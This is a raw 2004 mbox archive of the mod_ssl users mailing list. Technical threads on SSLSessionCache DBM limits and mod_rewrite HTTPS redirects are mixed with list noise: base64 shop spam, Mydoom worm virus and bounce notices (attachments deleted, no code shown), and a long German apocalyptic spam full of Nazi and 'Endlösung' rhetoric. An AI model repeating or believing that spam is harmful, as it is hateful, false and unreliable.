X-MSMail-Priority: Normal
Date: Fri,  2 Apr 2004 21:19:19 +0200 (CEST)

This is a multi-part message in MIME format.

------=_NextPart_IZOCGCeZKSN90hoH
Content-Type: multipart/alternative;
	boundary="----=_NextPart_IZOCGCeZKSN90hoHAA"


------=_NextPart_IZOCGCeZKSN90hoHAA
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: base64

PGh0bWw+Cgo8aGVhZD4KPG1ldGEgbmFtZT0iR0VORVJBVE9SIiBjb250ZW50PSJNaWNyb3NvZnQg
RnJvbnRQYWdlIDUuMCI+CjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVudD0iRnJvbnRQYWdlLkVk
aXRvci5Eb2N1bWVudCI+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0i
dGV4dC9odG1sOyBjaGFyc2V0PWJpZzUiPgo8dGl0bGU+t3O8V7r0rbYxPC90aXRsZT4KPC9oZWFk
PgoKPGJvZHk+Cgo8cCBhbGlnbj0iY2VudGVyIj4KPGEgaHJlZj0iaHR0cDovL3Nob3AzMTguaGlw
ZXJtYWxsLmhpbmV0Lm5ldC9TaG9wU3R5bGUvYW90aDEvZGVmYXVsdC5hc3AiPgo8aW1nIGJvcmRl
cj0iMCIgc3JjPSJodHRwOi8vc2hvcDMxOC5oaXBlcm1hbGwuaGluZXQubmV0L3N0b3JlL2Y0L7TT
p/iocblqwvfB97lxpGyz+DAwMC5qcGciIHdpZHRoPSI2NTAiIGhlaWdodD0iNTU5Ij48L2E+PC9w
PgoKPC9ib2R5PgoKPC9odG1sPg==


------=_NextPart_IZOCGCeZKSN90hoHAA--
------=_NextPart_IZOCGCeZKSN90hoH--




From owner-modssl-users@modssl.org  Fri Apr  2 21:38:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 78204A8939; Fri,  2 Apr 2004 21:38:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cyrus.vandervecken.com (cyrus.vandervecken.com [64.124.43.248])
	by master.modssl.org (Postfix) with ESMTP id DF59EA897A
	for ; Fri,  2 Apr 2004 21:37:47 +0200 (CEST)
Received: from geoff by cyrus.vandervecken.com with local (Exim 3.35 #1 (Debian))
	id 1B9UTv-0004K4-00; Fri, 02 Apr 2004 11:37:35 -0800
From: Geoff Thorpe 
To: modssl-users@modssl.org
Subject: Re: Problems with SSLSessionCache
Date: Fri, 2 Apr 2004 14:37:02 -0500
User-Agent: KMail/1.6.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <200404021437.02937.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On April 2, 2004 01:41 pm, Loyless Jerrod A Contr ESC/NI7S1 wrote:
> I am using SSLSessionCache dbm:/usr/local/apache/logs/ssl_cache.  The
> dbm files are created but they remain empty when I attempt with client
> auth turned on.  Where is the size limitation set on the caching of
> sessions?  I do see the request=SET, status=BAD as you mentioned, which
> seems to indicate that Apache is never able to write to the file.

-----------------
mod_ssl-2.8.16-1.3.29/pkg.sslmod/ssl_scache_dbm.c:151-158
    /* be careful: do not try to store too much bytes in a DBM file! */
#ifdef SSL_USE_SDBM
    if ((idlen + nData) >= PAIRMAX)
        return FALSE;
#else
    if ((idlen + nData) >= 950 /* at least less than approx. 1KB */)
        return FALSE;
#endif
-----------------

and

-----------------
mod_ssl-2.8.16-1.3.29/pkg.sslmod/ssl_util_sdbm.h:76-84
#ifdef MOD_SSL
#define DBLKSIZ 16384                   /* SSL cert chains require more */
#define PBLKSIZ 8192                    /* SSL cert chains require more */
#define PAIRMAX 8008                    /* arbitrary on PBLKSIZ-N */
#else
#define DBLKSIZ 4096
#define PBLKSIZ 1024
#define PAIRMAX 1008                    /* arbitrary on PBLKSIZ-N */
#endif
-----------------

My advice would be to use shmcb rather than dbm, if you can. Not that I'm 
biased of course, oh no. :-)

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From sinai1@firemail.de  Sun Apr  4 09:03:55 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from delta.mailer.de (worm-d9b96fee.pool.mediaWays.net [217.185.111.238])
	by master.modssl.org (Postfix) with SMTP id E9EADA8972
	for ; Sun,  4 Apr 2004 09:03:30 +0200 (CEST)
From: "Der Messias kommt" 
To: modssl-users-l@master.modssl.org
Subject: Zeichen  von Gott
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Tue, 2 Mar 2004 08:04:12
Message-Id: <20040404070330.E9EADA8972@master.modssl.org>

Zeichen von Gott
English
http://zion.daf4f.de

German 

Zeichen
 von Gott. Der Messias kommt. Wir haben den Weltuntergang.
Zeichen von
 Gott. Der Messias kommt. Wir haben den Weltuntergang und
 schon längst 3 Weltkrieg. Die Menschheit steht vorm
 Jüngsten Tag. Aber auch vorm größten Holocaust den die
 Menschheit jemals erleben wird. Jeder zweite Mensch
 landet im Feuersee. Wenn jetzt der Messias nicht kommt
 (Jesus Christus, Sohn Gottes, König der Juden) kommt
 Gott als Teufel hat Deutschland die ganze Menschheit in
 die Hölle gebracht. Dank dem Brandenburger Nazitor in
 Berlin wird jetzt jeder Mensch genau so hart bestraft wie
 Adolf Hitler. Das bedeutet Hölle für alle Zeiten
 "Endlösung"
Zeichen von
 Gott ist der letzte Schlüssel fürs Paradies für jeden
 Menschen und muss sofort weltweit verbreitet werden. Die
 Menschheit steht vorm Jüngsten Tag und muss die Erde
 sofort  verlassen.
Jesus
 Christus ein Diamand ist unser Erlöser kann uns von der
 Schuld befreien und die ganze Menschheit vorm Untergang
 retten. Ihr müsst Euch den Diamanten holen. Sonnst
 werdet Ihr niemals Ins Reich Gottes eintreten dürfen.
 Der Diamant ist damit mehr wert als alle Reichtümer
 dieser Welt. Und diese Erde kommt weg vom Reiche des
 Luzifers. Des Bösen Weltall Hölle. Weil die Erde Gott
 gehört und der Mensch ein Ebenbild Gottes ist. 
Erst wenn das
 Evangelium weltweit verbreitet wird kommt der Messias,
 haben wir den verbotenen Apfelbaum mit der Schlange
 endlich los dürfen alle Christen die den Herrn huldigten
 und den Willen Gottes erfüllten vor Gottes Herrlichket
 treten das Paradies für alle Ewigkeit. Zeichen von Gott
 ist für jeden Menschen der letzte Schlüssel fürs
 Paradies, und damit gigantisch wertvoll mit Geld nicht
 mehr zu bezahlen die letzte Weg ins Paradies für die
 ganze Menschheit.
Das
 Brandenburger Nazitor in Berlin ist das Höllentor der
 Menschheit. Wer den Satan huldigt muss den Becher des
 Zornes trinken und wird vor den Engel Gottes lebendig
 verbrannt. Das Brandenburger Tor muss daher sofort
 abgerissen werden!!!
Deutschland
 hat die Weltmacht die ganze Menschheit in die Hölle zu
 bringen und muss daher sofort dem Gericht Gottes
 unterstellt werden. Wenn Deutschland jetzt nicht sühnt
 und das Brandenburger Nazitor in Berlin stehen bleibt
 muss die ganze Menschheit untergehen.
Deutschland
 hat sich den Friedensnobelpreis ergaunert obwohl es den
 ganzen Osten über 200 Millionen Menschen verheizt
 verraten und verkauft hat. Ein gigantisches
 Verbrechen.Das wiedervereinte Nazideutschland hat sogar
 Deutschland verraten. Schlesien Pommern Ostpreußen. Ein
 perverses Verbrechen. Auf Hochverrat steht nicht nur die
 Todesstrafe sondern Hölle für alle Zeiten. Der
 Hochverrat muss daher sofort wieder rückgängig gemacht
 werden, und das wiedervereinte Nazipack kann sich den
 Friedensnobelpreis in den Arsch stecken. Dort gehört er
 auch hin. Wir haben 6 Weltkriege auf einmal und stehen
 vorm Jüngsten Tag. Das bedeudet Weltuntergang. Wegen
 Deuschland wird die ganze Schöpfung vernichtet und die
 Erde muss sofort verlassen werden.
Wer 
Zeichen
 von Gott nicht verbreitet oder sogar vernichtet kassiert
 allein schon dafür die Endlösung.  Das Urteil vom
 Jüngsten Gericht. Tod am Kreuz Hölle für alle Zeiten.
 Das gilt für die ganze Menschheit.
Die Blinden
 führen die Blinden und Ihr werdet alle ins Schwarze Loch
 fallen ins ewige Feuer. Endlösung; Hütet Euch vor dem
 Sauerteig der Faffen und der Regierungen. Sie haben Sich
 auf den Stuhl des Mose gesetzt und lassen keinen Menschen
 ins Paradies gehen.Das gilt besonders für die USA und
 erst recht für Deutschland. Die Erde wird nicht von Gott
 regiert sondern vom Satan der die ganze Menschheit in der
 Hölle haben will.
Wer die
 Menschheit nicht ins Paradies ruft hat mindestens genau
 so viel Dreck am Stecken wie Adolf Hitler und wird genau
 so hart bestraft. Das bedeutet Hölle für alle Zeiten.
 (Endlösung) Gott will der Menschheit ein sehr schnelles
 Ende bereiten. Wer jetzt nicht ins Paradies geht landet
 im Feuersee. Die grauenhafteste Strafe die sich kein
 Mensch mehr vorstellen kann.
Die Erde ist
 ein Sandkorn auf der Wage und kann jeder Zeit vernichtet
 werden. Aus dem Grunde ist jeder Mensch verflichtet die
 Menschheit sofort ins Paradies zu rufen. Zeichen von Gott
 ist keine Werbung sondern eine Botschaft und muss sofort
 weltweit verbreitet werden.
Die letzte Rettung für die ganze
 Menschheit ist Zeichen von Gott
Der
 Apostel Abraham Wiege der Menschheit
 






From bitdefender@hodgsonfamily.org  Sun Apr  4 21:11:22 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from hodgsons.demon.co.uk (hodgsons.demon.co.uk [194.222.80.58])
	by master.modssl.org (Postfix) with SMTP id 2C9C5A8962
	for ; Sun,  4 Apr 2004 21:10:55 +0200 (CEST)
Received: (qmail 8459 invoked from network); 4 Apr 2004 19:10:35 -0000
X-BitDefender-Scanner: Clean, Agent: Qmail 1.5.6 (brookfield)
X-BitDefender-Spam: No (20)
Received: from localhost (127.0.0.1)
  by brookfield.hodgsonfamily.org (127.0.0.1) with SMTP; 04 Apr 2004 19:10:34 -0000
From: bitdefender@hodgsonfamily.org
To: modssl-users-l@master.modssl.org
Date: Sun, 04 Apr 2004 20:10:34 +0100
MIME-Version: 1.0
Subject: BitDefender found an infected object
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Message-Id: <20040404191055.2C9C5A8962@master.modssl.org>

BitDefender found an infected object in a message that was sent from
your address
To: [vi-photographers@listserv.hodgsonfamily.org]
Subject: [Your IP was logged]
Object: data.zip=>(zip stored)
Virus: Win32.Mydoom.F@mm


We strongly advise you to check your computer using BitDefender
antivirus products. You can download a fully functional trial
version of BitDefender from http://www.bitdefender.com


The BitDefender Lab
www.bitdefender.com


From bitdefender@hodgsonfamily.org  Sun Apr  4 21:11:22 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from hodgsons.demon.co.uk (hodgsons.demon.co.uk [194.222.80.58])
	by master.modssl.org (Postfix) with SMTP id 2A453A8938
	for ; Sun,  4 Apr 2004 21:10:55 +0200 (CEST)
Received: (qmail 8428 invoked from network); 4 Apr 2004 19:10:28 -0000
X-BitDefender-Scanner: Clean, Agent: Qmail 1.5.6 (brookfield)
X-BitDefender-Spam: No (20)
Received: from localhost (127.0.0.1)
  by brookfield.hodgsonfamily.org (127.0.0.1) with SMTP; 04 Apr 2004 19:10:28 -0000
From: bitdefender@hodgsonfamily.org
To: modssl-users-l@master.modssl.org
Date: Sun, 04 Apr 2004 20:10:28 +0100
MIME-Version: 1.0
Subject: BitDefender found an infected object
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Message-Id: <20040404191055.2A453A8938@master.modssl.org>

BitDefender found an infected object in a message that was sent from
your address
To: [vi-photographers@listserv.hodgsonfamily.org]
Subject: [Your IP was logged]
Object: data.zip=>data.png                                                                                                         .scr
Virus: Win32.Mydoom.F@mm


We strongly advise you to check your computer using BitDefender
antivirus products. You can download a fully functional trial
version of BitDefender from http://www.bitdefender.com


The BitDefender Lab
www.bitdefender.com


From MAILER-DAEMON  Sun Apr  4 21:11:23 2004
Return-Path: <>
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from hodgsons.demon.co.uk (hodgsons.demon.co.uk [194.222.80.58])
	by master.modssl.org (Postfix) with SMTP id 8C9C7A8972
	for ; Sun,  4 Apr 2004 21:10:55 +0200 (CEST)
Received: (qmail 8418 invoked for bounce); 4 Apr 2004 19:10:27 -0000
X-BitDefender-Scanner: Clean, Agent: Qmail 1.5.6 (brookfield)
X-BitDefender-Spam: No (66)
Date: 4 Apr 2004 19:10:27 -0000
From: MAILER-DAEMON@hodgsonfamily.org
To: modssl-users-l@master.modssl.org
Subject: failure notice
Message-Id: <20040404191055.8C9C7A8972@master.modssl.org>

Hi. This is the qmail-send program at hodgsonfamily.org.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

:
Sorry, only subscribers may post. If you are a subscriber, please forward this message to vi-photographers-owner@listserv.hodgsonfamily.org to get your new address included (#5.7.2)

--- Below this line is a copy of the message.

Return-Path: 
Received: (qmail 8399 invoked from network); 4 Apr 2004 19:10:26 -0000
X-BitDefender-Scanner: Infected (File: data.zip=>data.png                                                                                                         .scr, Win32.Mydoom.F@mm, Deleted; File: data.zip=>(zip stored), Win32.Mydoom.F@mm, Deleted), Agent: Qmail 1.5.6 (brookfield)
X-BitDefender-Spam: No (74)
Received: from unknown (HELO master.modssl.org) (61.19.201.10)
  by brookfield.hodgsonfamily.org (192.168.1.2) with ESMTP; 04 Apr 2004 19:09:31 -0000
From: modssl-users-l@master.modssl.org
To: vi-photographers@listserv.hodgsonfamily.org
Subject: Your IP was logged
Date: Mon, 5 Apr 2004 03:26:27 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0006_A294ACDA.458E1D99"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

------=_NextPart_000_0006_A294ACDA.458E1D99
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

Okay


------=_NextPart_000_0006_A294ACDA.458E1D99--


From bitdefender@hodgsonfamily.org  Sun Apr  4 21:12:13 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from hodgsons.demon.co.uk (hodgsons.demon.co.uk [194.222.80.58])
	by master.modssl.org (Postfix) with SMTP id 90AD9A8938
	for ; Sun,  4 Apr 2004 21:12:09 +0200 (CEST)
Received: (qmail 8518 invoked from network); 4 Apr 2004 19:12:00 -0000
X-BitDefender-Scanner: Clean, Agent: Qmail 1.5.6 (brookfield)
X-BitDefender-Spam: No (20)
Received: from localhost (127.0.0.1)
  by brookfield.hodgsonfamily.org (127.0.0.1) with SMTP; 04 Apr 2004 19:11:59 -0000
From: bitdefender@hodgsonfamily.org
To: modssl-users-l@master.modssl.org
Date: Sun, 04 Apr 2004 20:11:59 +0100
MIME-Version: 1.0
Subject: BitDefender found an infected object
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Message-Id: <20040404191209.90AD9A8938@master.modssl.org>

BitDefender found an infected object in a message that was sent from
your address
To: [vi-photographers@listserv.hodgsonfamily.org]
Subject: [Your IP was logged]
Object: data.zip=>(zip stored)
Virus: Win32.Mydoom.F@mm


We strongly advise you to check your computer using BitDefender
antivirus products. You can download a fully functional trial
version of BitDefender from http://www.bitdefender.com


The BitDefender Lab
www.bitdefender.com


From bitdefender@hodgsonfamily.org  Sun Apr  4 21:12:17 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from hodgsons.demon.co.uk (hodgsons.demon.co.uk [194.222.80.58])
	by master.modssl.org (Postfix) with SMTP id A8C6CA8934
	for ; Sun,  4 Apr 2004 21:12:08 +0200 (CEST)
Received: (qmail 8498 invoked from network); 4 Apr 2004 19:11:58 -0000
X-BitDefender-Scanner: Clean, Agent: Qmail 1.5.6 (brookfield)
X-BitDefender-Spam: No (20)
Received: from localhost (127.0.0.1)
  by brookfield.hodgsonfamily.org (127.0.0.1) with SMTP; 04 Apr 2004 19:11:57 -0000
From: bitdefender@hodgsonfamily.org
To: modssl-users-l@master.modssl.org
Date: Sun, 04 Apr 2004 20:11:57 +0100
MIME-Version: 1.0
Subject: BitDefender found an infected object
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Message-Id: <20040404191208.A8C6CA8934@master.modssl.org>

BitDefender found an infected object in a message that was sent from
your address
To: [vi-photographers@listserv.hodgsonfamily.org]
Subject: [Your IP was logged]
Object: data.zip=>data.png                                                                                                         .scr
Virus: Win32.Mydoom.F@mm


We strongly advise you to check your computer using BitDefender
antivirus products. You can download a fully functional trial
version of BitDefender from http://www.bitdefender.com


The BitDefender Lab
www.bitdefender.com


From MAILER-DAEMON  Sun Apr  4 21:12:18 2004
Return-Path: <>
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from hodgsons.demon.co.uk (hodgsons.demon.co.uk [194.222.80.58])
	by master.modssl.org (Postfix) with SMTP id 4258AA8962
	for ; Sun,  4 Apr 2004 21:12:11 +0200 (CEST)
Received: (qmail 8494 invoked for bounce); 4 Apr 2004 19:11:58 -0000
X-BitDefender-Scanner: Clean, Agent: Qmail 1.5.6 (brookfield)
X-BitDefender-Spam: No (66)
Date: 4 Apr 2004 19:11:57 -0000
From: MAILER-DAEMON@hodgsonfamily.org
To: modssl-users-l@master.modssl.org
Subject: failure notice
Message-Id: <20040404191211.4258AA8962@master.modssl.org>

Hi. This is the qmail-send program at hodgsonfamily.org.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

:
Sorry, only subscribers may post. If you are a subscriber, please forward this message to vi-photographers-owner@listserv.hodgsonfamily.org to get your new address included (#5.7.2)

--- Below this line is a copy of the message.

Return-Path: 
Received: (qmail 8469 invoked from network); 4 Apr 2004 19:11:57 -0000
X-BitDefender-Scanner: Infected (File: data.zip=>data.png                                                                                                         .scr, Win32.Mydoom.F@mm, Deleted; File: data.zip=>(zip stored), Win32.Mydoom.F@mm, Deleted), Agent: Qmail 1.5.6 (brookfield)
X-BitDefender-Spam: No (54)
Received: from mx2.mailhop.org (63.209.15.214)
  by brookfield.hodgsonfamily.org (192.168.1.2) with ESMTP; 04 Apr 2004 19:11:32 -0000
Received: from [61.19.201.10] (helo=master.modssl.org)
	by mx2.mailhop.org with esmtp (Exim 4.20)
	id 1BAD1A-0009vy-ND
	for vi-photographers@listserv.hodgsonfamily.org; Sun, 04 Apr 2004 12:10:55 -0700
From: modssl-users-l@master.modssl.org
To: vi-photographers@listserv.hodgsonfamily.org
Subject: Your IP was logged
Date: Mon, 5 Apr 2004 03:26:27 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0006_A294ACDA.458E1D99"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: 
Received-SPF: none (gallium.sjc.dyndns.org: domain of modssl-users-l@master.modssl.org does not designate permitted sender hosts)

This is a multi-part message in MIME format.

------=_NextPart_000_0006_A294ACDA.458E1D99
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

Okay


------=_NextPart_000_0006_A294ACDA.458E1D99--


From owner-modssl-users@modssl.org  Wed Apr  7 00:51:01 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 23C79A895E; Wed,  7 Apr 2004 00:51:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from evanbrown.org (pcp09228349pcs.sanarb01.mi.comcast.net [69.241.233.88])
	by master.modssl.org (Postfix) with SMTP id 50550A8972
	for ; Wed,  7 Apr 2004 00:51:00 +0200 (CEST)
Date: Tue, 06 Apr 2004 18:41:42 -0500
To: modssl-users@modssl.org
Subject: Re: Incoming Fax
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  7 18:29:35 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2B4C4A8966; Wed,  7 Apr 2004 18:29:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from yonge.cs.toronto.edu (yonge.cs.toronto.edu [128.100.1.8])
	by master.modssl.org (Postfix) with SMTP id 7B9F9A895E
	for ; Wed,  7 Apr 2004 18:29:14 +0200 (CEST)
Received: from broncosp.pdmlab.local ([192.168.71.201], HELO=broncos) by yonge.cs.toronto.edu with SMTP id <205294-19119>; Wed, 7 Apr 2004 11:35:51 -0400
Message-ID: <000801c41cb6$15a1fe20$c947a8c0@broncos>
From: "simontst" 
To: 
Subject: mod_ssl, mod_rewrite, apache2 problem.
Date:	Wed, 7 Apr 2004 11:36:23 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "simontst" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I am running apache2, mod_ssl, on freebsd4.9 and I am using the mod_rewrite
engine to redirect requests for http -> https.
I have this working using:

RewriteEngine on
RewriteCond %{HTTPS} !=on
RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [R,L]

The nasty problem is that when I redirect a request for a page (e.g.
index.html) that contains an  tag in the form of:



IE 6 continually complains that the page contains insecured items and
refuses to display the yellow padlock. However, an examination of my rewrite
logs indicates that the GET for the logos.gif is being redirected:


IPADDR - - [06/Apr/2004:15:26:05 --0400] init rewrite engine with requested
uri /logos.gif
IPADDR- - [06/Apr/2004:15:26:05 --0400] applying pattern '^/(.*)' to uri
'/logos.gif'
IPADDR - - [06/Apr/2004:15:26:05 --0400] RewriteCond: input=''
pattern='!=on' => matched
IPADDR - - [06/Apr/2004:15:26:05 --0400] rewrite /logos.gif ->
https://SERVER/logos.gif
IPADDR - - [06/Apr/2004:15:26:05 --0400] implicitly forcing redirect
(rc=302) with https://SERVER/logos.gif
IPADDR- - [06/Apr/2004:15:26:05 --0400] escaping https://SERVER/logos.gif
for redirect
IPADDR - - [06/Apr/2004:15:26:05 --0400] redirect to
https://SERVER/logos.gif [REDIRECT/302]

If I remove the  tag from index.html, the complaints go away,
index.html is accessed using https, and the padlock appears. So it would
appear that there is an issue with the GET for the .gif

Thinking that browser might be getting confused by two redirects in a row
(the first for http://server/index.html, and the second for
http://server/logos.gif) I have tried to GET the logos.gif directly via
http://server/logos.gif. But again, even though the request is redirected to
https://server/logos.gif, the same warning message pops up and IE refuses to
display the padlock. But if I bypass mod_rewrite and GET the gif using the
URL: https://server/logos.gif, IE does not complain.

Finally, Mozilla does not complain at all!! Jeez! My inclination is to
modify the s so that they all point to a relative path name instead
of a URL but I inherited the code and this would prove onerous. Moreover, it
does not seem reasonable to me that my redirects should cause IE6 such
problems.

If anyone has some ideas on this I would be extremely grateful. I am doing
something totally stupid here?

Thanks

Aproto Simaki

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  7 18:34:45 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2C94EA8972; Wed,  7 Apr 2004 18:34:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alpha2.AXP.MDX.AC.UK (alpha2.axp.mdx.ac.uk [158.94.0.14])
	by master.modssl.org (Postfix) with ESMTP id 1871DA895E
	for ; Wed,  7 Apr 2004 18:34:40 +0200 (CEST)
Date: Wed, 07 Apr 2004 17:27:47 +0000
From: a.moon@mdx.ac.uk
Subject: mod_ssl, mod_rewrite, apache2 problem.
To: modssl-users@modssl.org
Message-id: <32F5F700E4@mdx-nwsup1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away until the 14th April 2004
I will get back to you as soon as i can when I return.  
If the matter is urgent and concerns OASIS, MUBSWEB or MUBS Online 
then please contact one of the other members of the OLSU team who will try to help.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  8 12:30:03 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A6C9DA8943; Thu,  8 Apr 2004 12:30:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx2.redhat.com (mx2.redhat.com [66.187.237.31])
	by master.modssl.org (Postfix) with ESMTP id 0675FA8934
	for ; Thu,  8 Apr 2004 12:29:47 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx2.redhat.com (8.11.6/8.11.6) with ESMTP id i38A31G06480;
	Thu, 8 Apr 2004 06:03:02 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i38ATcj09187;
	Thu, 8 Apr 2004 06:29:38 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i38ATb19003963;
	Thu, 8 Apr 2004 11:29:37 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i38ATaCn003962;
	Thu, 8 Apr 2004 11:29:36 +0100
Date: Thu, 8 Apr 2004 11:29:36 +0100
From: Joe Orton 
To: simontst 
Cc: modssl-users@modssl.org
Subject: Re: mod_ssl, mod_rewrite, apache2 problem.
Message-ID: <20040408102935.GA3952@redhat.com>
Mail-Followup-To: simontst ,
	modssl-users@modssl.org
References: <000801c41cb6$15a1fe20$c947a8c0@broncos>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <000801c41cb6$15a1fe20$c947a8c0@broncos>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Apr 07, 2004 at 11:36:23AM -0400, simontst wrote:
> Hi,
> 
> I am running apache2, mod_ssl, on freebsd4.9 and I am using the mod_rewrite
> engine to redirect requests for http -> https.
> I have this working using:
> 
> RewriteEngine on
> RewriteCond %{HTTPS} !=on

This doesn't work properly in 2.0: try %{LA-U:HTTPS} instead.  Without
fixing that it's likely the rule is being applied to *all* requests, so
issuing a redirect for https://foo/bar to https://foo/bar which browsers
may do weird things for.

> RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [R,L]

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  8 12:35:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E4E3FA8943; Thu,  8 Apr 2004 12:35:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from payute.gssi.es (payute.gssi.es [217.11.114.131])
	by master.modssl.org (Postfix) with ESMTP id 88E75A8934
	for ; Thu,  8 Apr 2004 12:35:23 +0200 (CEST)
Received: from gssi.es (atila.gssi.es [80.38.252.251])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
